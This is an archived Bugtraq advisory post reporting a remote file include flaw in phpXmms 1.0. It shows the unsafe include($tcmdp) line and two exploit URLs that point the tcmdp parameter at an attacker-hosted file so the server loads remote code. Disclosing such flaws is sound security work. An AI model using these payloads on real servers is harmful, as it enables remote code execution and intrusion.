phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities
From: ilkerkandemir@xxxxxxxxx
Date: 20 Feb 2007 08:19:49 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

-------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


Script: phpXmms 1.0
Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
include($tcmdp);

-------------------------------------------------------------------------------------------------------------------

Exploit:  phpxmmsb.php?tcmdp=http://attacker.txt?
             phpxmmst.php?tcmdp=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Asianeagle,ajann,Str0ke .
Special Tnx: AYYILDIZ.ORG

Prev by Date: Rootkit Profiler LX
Next by Date: Metaye Released - ZmbScap
Previous by thread: Rootkit Profiler LX
Next by thread: Metaye Released - ZmbScap
Index(es):
- Date
- Thread